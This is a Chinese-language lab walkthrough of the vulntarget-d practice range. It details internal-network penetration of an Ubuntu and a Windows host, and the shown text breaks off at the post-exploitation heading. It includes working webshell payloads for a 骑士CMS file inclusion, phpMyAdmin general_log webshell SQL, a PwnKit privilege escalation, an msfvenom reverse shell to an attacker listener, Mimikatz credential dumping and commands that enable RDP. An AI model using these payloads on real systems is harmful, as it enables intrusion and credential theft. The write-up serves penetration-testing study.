【靶场系列】vulntarget-d靶场练习

记录vultarget靶场系列,学习内网渗透相关知识

[TOC]

外网Ubuntu

端口扫描

端口扫描,探测到mysql未授权,但是无法利用

image-20220501161311432

web打点

根据端口信息,应该是宝塔搭建的站点

80端口无站点

81端口存在骑士CMS

image-20220501161810449

访问8888端口,确认是宝塔面板

image-20220501161851835

经测试不存在phpmyadmin未授权

image-20220501162123249

仍然从81端口的骑士CMS入手,发现底部存在版本号v6.0.20

image-20220501162345032

搜索发现存在文件包含漏洞,可getshell,参考:https://codeantenna.com/a/MT1KAcuVTZ

日志文件写入恶意代码:

  • POST访问:http://192.168.1.228:81/index.php?m=home&a=assign_resume_tpl
  • data:variable=1&tpl=<?php fputs(fopen("yt.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

文件包含,执行恶意代码:

  • POST访问:http://192.168.1.228:81/index.php?m=home&a=assign_resume_tpl
  • data:variable=1&tpl=data/Runtime/Logs/Home/21_01_20.log
  • 日期改为当前时间

包含后即执行恶意代码,根目录生成一句话木马,蚁剑连接上线:

image-20220501163448896

信息搜集

存在内网,ubuntu18.04-64位机器

image-20220501163846376

MSF上线

msf生成反向连接马,蚁剑上传执行后上线

image-20220501164248644

ubuntu提权

使用local_exploit_suggester模块探测未果

image-20220501201224823

使用linux-exploit-suggester-2未果

image-20220501201852128

使用linux-exploit-suggester,探测到很多洞

image-20220501202202093

CVE-2021-4034

使用https://codeload.github.com/berdav/CVE-2021-4034/zip/main一直失败

image-20220501203205239

https://github.com/luijait/PwnKit-Exploit.git

clone执行make即可生成提权可执行文件

image-20220501165553957

通过蚁剑上传,MSF中执行,即可成功提权

image-20220501165619428

提权后再执行tcp马,即可反弹回一个root的会话

image-20220501165901150

内网信息搜集

添加路由

route add 10.0.20.0 255.255.255.0 1

使用msf的portscan模块进行tcp扫描

image-20220501170208039

扫描到内网中还存在一台主机128(.1是vmware宿主机,忽略),根据开放的端口来看,应该是windows主机

image-20220501192825721

外网主机使用gost监听端口,作为访问内网的跳板机

image-20220501184529907

内网Windows

信息搜集

探测到开放80、139、135、445、3306端口

web打点

目录扫描,发现l.php、phpmyadmin

image-20220501193325500
image-20220501193435745

phpmyadmin弱口令

admin:admin直接进来了

image-20220501193531996

简单做下信息搜集

image-20220501193802013

phpmyadmin getshell

通过phpmyadmin写日志getshell

开启日志

set global general_log=on;

修改日志文件名称和存放位置:

set global general_log_file='C:/phpstudy/PHPTutorial/www/yutt.php';

写入一句话

SELECT '<?php @eval($_POST[1]); ?>'

蚁剑连接

image-20220501194441806

做下信息搜集,普通用户权限,不存在域,四个补丁

image-20220501194636210

不存在下一层内网

image-20220501194721031

存在火绒

image-20220501194944010

不存在永恒之蓝漏洞

image-20220501195503115

MSF上线

同样外网主机做跳板机,上传一个msf反向tcp马(掩日通用免杀

 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.20.132 lport=55555 -f exe -o 55555.exe

跳板机:

./gost-linux-amd64 -L=:55555/192.168.1.214:55555

kali监听,蚁剑执行后拿到会话

image-20220501195950622

直接getsystem成功提权

image-20220501200009238

抓取密码

load kiwi
creds_all
image-20220501200134138

解出admin

image-20220501200158649

开启远程桌面

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

kali挂上代理使用remmina连接,crow:admin

image-20220501200551934

后渗透

...